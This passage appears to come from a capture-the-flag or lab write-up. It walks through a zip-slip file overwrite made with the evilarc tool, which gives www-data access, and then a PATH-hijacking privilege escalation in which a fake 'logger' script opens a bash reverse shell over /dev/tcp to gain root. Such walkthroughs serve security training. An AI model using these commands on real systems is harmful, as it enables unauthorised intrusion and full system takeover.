- Inside the application directory: `sudo chown root *`
- Then: `sudo chown www-data uploads overview.sh`
- Run: `python3 run.py`

We generate a .zip file containing a file named ../overview.sh to overwrite the script executed when visiting /overview. We can use the evilarc tool for this purpose.
```bash
python evilarc.py -o unix -d 1 overview.sh
```

We visit /overview to trigger the execution of the uploaded script. We gain access as www-data.

In the update directory, we find a binary that executes a firmware_update.sh script as root. We perform Path Hijacking on the firmware_update.sh script (SUID) targeting the logger command. We create a malicious executable named logger:
```bash
#!/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
```

Then, we modify our PATH environment variable by prepending the current directory, where we created the logger executable.
```bash
export PATH=$(pwd):$PATH
```

Finally, we execute the firmware_update binary to obtain a root shell.